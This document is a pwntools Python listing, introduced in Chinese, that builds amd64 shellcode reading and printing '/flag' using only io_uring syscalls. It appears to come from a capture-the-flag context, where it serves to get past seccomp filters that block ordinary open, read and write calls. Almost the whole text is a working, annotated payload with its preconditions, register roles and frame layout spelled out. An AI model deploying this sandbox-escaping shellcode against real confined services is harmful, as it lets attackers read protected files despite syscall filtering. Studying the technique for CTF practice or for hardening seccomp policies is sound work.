io_uring


完整 shellcode 如下。前提:rdx 指向一块合法的可写内存(代码以 rdx+0xa00 为基址 rbp,在 rbp-0x120 ~ rbp+0x108 范围内读写),其中 io_uring_params 所在的 rbp-0xf0 起 120 字节事先应为全零(否则 io_uring_setup 会因 flags/resv 非零而返回 -EINVAL);另外 rsp 必须是有效栈,因为 shellcraft 生成的 push/pop 以及下面的 sub/push rsp 都会用到它:

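# -----------------------------------------------------------------------------
# io_uring-only "cat /flag" shellcode, assembled with pwntools (Intel syntax).
# `context`, `asm` and `shellcraft` come from `from pwn import *`, which is not
# part of this listing.
#
# Steps (only io_uring_setup / mmap / io_uring_enter are issued directly; the
# open/read/write happen inside the ring):
#   1. io_uring_setup(16, &params)                  -> ring fd
#   2. mmap the SQ ring, CQ ring and SQE array
#   3. submit IORING_OP_OPENAT("/flag"), wait for it, take cqe[0].res (the fd)
#   4. submit IORING_OP_READ(fd, buf, 0x64)
#   5. submit IORING_OP_WRITE(1, buf, 0x64)
#
# Caller preconditions (nothing below checks them):
#   * rdx points into a writable region. The scratch frame is rbp = rdx+0xa00
#     and the code touches rbp-0x120 .. rbp+0x108 (rdx+0x8e0 .. rdx+0xb08).
#   * The io_uring_params struct at rbp-0xf0 is never cleared here, so that
#     memory must already read as zero (io_uring_setup returns -EINVAL for
#     nonzero flags/resv). TODO(review): add an explicit clear if the caller
#     cannot guarantee this.
#   * rsp is a valid stack: shellcraft.syscall's push/pop sequences and the
#     sub/push/add rsp pairs in _submit() use it.
#   * No error checking: a failed OPENAT leaves a negative cqe.res that is
#     fed straight into READ as the fd, and neither enter() result is looked at.
#
# Frame layout (offsets from rbp):
#   -0x120  u32  fd returned by the OPENAT completion
#           (the original listing stored it at rbp-0x114, i.e. inside the
#            8-byte ring-fd slot at rbp-0x118; the later 8-byte load of the
#            ring fd then carried the flag fd in its upper half and only
#            worked because the kernel truncates io_uring_enter's fd argument
#            to 32 bits -- fixed by giving it its own slot)
#   -0x118  u64  ring fd from io_uring_setup
#   -0x110  u64  SQ ring mapping   (IORING_OFF_SQ_RING = 0)
#   -0x108  u64  CQ ring mapping   (IORING_OFF_CQ_RING = 0x8000000)
#   -0x100  u64  SQE array mapping (IORING_OFF_SQES    = 0x10000000)
#   -0xf0   struct io_uring_params (120 bytes, filled in by io_uring_setup)
#   -0x70   0x64-byte data buffer shared by READ and WRITE
#   +0x100  "/flag\0" path
#
# io_uring_params field offsets used (<linux/io_uring.h>):
#   params+0x2c sq_off.tail  -> rbp-0xc4
#   params+0x40 sq_off.array -> rbp-0xb0
#   params+0x64 cq_off.cqes  -> rbp-0x8c
# io_uring_sqe fields used: opcode +0, flags +1, fd +4, addr +0x10, len +0x18
# (the 8-byte store at +0x18 also zeroes the op-specific flags at +0x1c, so
# OPENAT runs with O_RDONLY and READ/WRITE with rw_flags = 0).
# Register roles once the rings are mapped: rbp = frame base, r13 = 0
# (neither is clobbered by the syscalls), r12 = ring fd around each enter().
# -----------------------------------------------------------------------------
context.arch = 'amd64'

SYS_io_uring_setup = 425
SYS_io_uring_enter = 426
IORING_OFF_SQ_RING = 0
IORING_OFF_CQ_RING = 0x8000000
IORING_OFF_SQES = 0x10000000
IORING_ENTER_GETEVENTS = 1
IORING_OP_OPENAT = 0x12
IORING_OP_READ = 0x16
IORING_OP_WRITE = 0x17
IOSQE_ASYNC = 0x10


def _clear_sqe0():
    """Assembly that zeroes sqe[0] (64 bytes) and leaves rax = SQE array base.

    Expects r13 == 0; eight qword stores cover the whole 64-byte sqe.
    """
    return asm("""
        mov rax, [rbp-0x100]
        mov [rax], r13
        mov [rax+8], r13
        mov [rax+0x10], r13
        mov [rax+0x18], r13
        mov [rax+0x20], r13
        mov [rax+0x28], r13
        mov [rax+0x30], r13
        mov [rax+0x38], r13
    """)


def _submit(min_complete, restore_rsp=True):
    """Assembly that publishes sqe[0] and calls
    io_uring_enter(ring_fd, 1, min_complete, IORING_ENTER_GETEVENTS, NULL, 0).

    Expects r13 == 0. Every submission reuses sqe[0]: sq_array[0] is set to 0
    (the 8-byte store also clears sq_array[1]) and sq_off.tail is bumped by
    one. On the third submission the kernel consumes sq_array[2], which this
    code never writes -- it presumably relies on the freshly mapped ring
    reading as zero; TODO(review) confirm on the target kernel.

    The `sub rsp, 8; push 0` before the syscall looks like a leftover from a
    compiled libc syscall() call with a seventh stack argument; the raw
    syscall instruction does not need it. It is kept so the emitted bytes
    match the original, and `restore_rsp` controls the matching
    `add rsp, 0x10` (the original listing omits it after the last enter).
    """
    code = asm("""
        mov edx, [rbp-0xb0]         /* sq_off.array */
        mov rax, [rbp-0x110]
        add rax, rdx
        mov [rax], r13              /* sq_array[0] = 0 -> sqe[0] */
        mov edx, [rbp-0xc4]         /* sq_off.tail */
        mov rax, [rbp-0x110]
        add rax, rdx
        mov edx, [rax]
        add edx, 1
        mov [rax], edx              /* tail += 1 */
        mov r12, [rbp-0x118]        /* ring fd */
        xor rax, rax                /* shellcraft.syscall reloads rax anyway */
        sub rsp, 8
        push 0
    """)
    code += asm(shellcraft.syscall(SYS_io_uring_enter, "r12", 1, min_complete,
                                   IORING_ENTER_GETEVENTS, 0, 0))
    if restore_rsp:
        code += asm("add rsp, 0x10")
    return code


# 1. io_uring_setup(16, &params); params lives at rbp-0xf0 and must read as zero.
shellcode = asm("""
    mov rbp, rdx
    add rbp, 0xa00              /* rbp = scratch frame base */
    mov rbx, rbp
    sub rbx, 0xf0               /* rbx = &params */
""")
shellcode += asm(shellcraft.syscall(SYS_io_uring_setup, 16, "rbx"))
shellcode += asm("""
    sub rbx, 0x28               /* rbx = rbp-0x118 */
    mov [rbx], rax              /* save the ring fd as a qword */
    mov r13, rax                /* r13 = ring fd for the mmaps below */
""")

# 2. Map the three ring regions PROT_READ|PROT_WRITE (3), MAP_SHARED (1).
#    1000 bytes is rounded up to one page by mmap; presumably enough for a
#    16-entry ring -- TODO(review): check sq_off.array + 16*4 fits on the target.
shellcode += asm(shellcraft.mmap(0, 1000, 3, 1, "r13", IORING_OFF_SQ_RING))
shellcode += asm("mov [rbp-0x110], rax")
shellcode += asm(shellcraft.mmap(0, 1000, 3, 1, "r13", IORING_OFF_CQ_RING))
shellcode += asm("mov [rbp-0x108], rax")
shellcode += asm(shellcraft.mmap(0, 1000, 3, 1, "r13", IORING_OFF_SQES))
shellcode += asm("""
    mov [rbp-0x100], rax
    xor r13, r13                /* r13 = 0 for the rest of the shellcode */
""")

# 3. sqe[0] = OPENAT(dirfd=0, "/flag", O_RDONLY) with IOSQE_ASYNC. dirfd is
#    irrelevant because the path is absolute.
shellcode += _clear_sqe0()
shellcode += asm("""
    mov byte ptr [rax], {op:#x}     /* sqe.opcode = IORING_OP_OPENAT */
    mov byte ptr [rax+1], {fl:#x}   /* sqe.flags  = IOSQE_ASYNC */
    mov rdx, 0x67616c662f           /* "/flag", little-endian, NUL-padded */
    mov [rbp+0x100], rdx
    mov rdx, rbp
    add rdx, 0x100
    mov [rax+0x10], rdx             /* sqe.addr = path */
""".format(op=IORING_OP_OPENAT, fl=IOSQE_ASYNC))
shellcode += _submit(1)             # wait for the OPENAT completion

# 4. cqe[0].res is the fd of /flag (or -errno). Save it in its own slot.
shellcode += asm("""
    mov edx, [rbp-0x8c]             /* cq_off.cqes */
    mov rax, [rbp-0x108]
    add rax, rdx                    /* rax = &cqe[0] */
    mov eax, [rax+8]                /* cqe.res */
    mov [rbp-0x120], eax
""")

# 5. sqe[0] = READ(fd, buf=rbp-0x70, len=0x64, off=0).
shellcode += _clear_sqe0()
shellcode += asm("""
    mov byte ptr [rax], {op:#x}     /* sqe.opcode = IORING_OP_READ */
    mov ecx, [rbp-0x120]
    mov [rax+4], ecx                /* sqe.fd = flag fd */
    lea rdx, [rbp-0x70]
    mov [rax+0x10], rdx             /* sqe.addr = buf */
    mov rbx, 0x64
    mov [rax+0x18], rbx             /* sqe.len = 0x64, rw_flags = 0 */
""".format(op=IORING_OP_READ))
shellcode += _submit(1)             # wait for the READ completion

# 6. sqe[0] = WRITE(1, buf, 0x64). The CQ head is never advanced, so the
#    three completions stay in the ring; min_complete=3 therefore blocks
#    until the WRITE has completed as well.
shellcode += _clear_sqe0()
shellcode += asm("""
    mov byte ptr [rax], {op:#x}     /* sqe.opcode = IORING_OP_WRITE */
    mov ecx, 1
    mov [rax+4], ecx                /* sqe.fd = stdout */
    lea rdx, [rbp-0x70]
    mov [rax+0x10], rdx             /* sqe.addr = buf */
    mov rbx, 0x64
    mov [rax+0x18], rbx             /* sqe.len = 0x64, rw_flags = 0 */
""".format(op=IORING_OP_WRITE))
shellcode += _submit(3, restore_rsp=False)   # original ends right after the syscall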

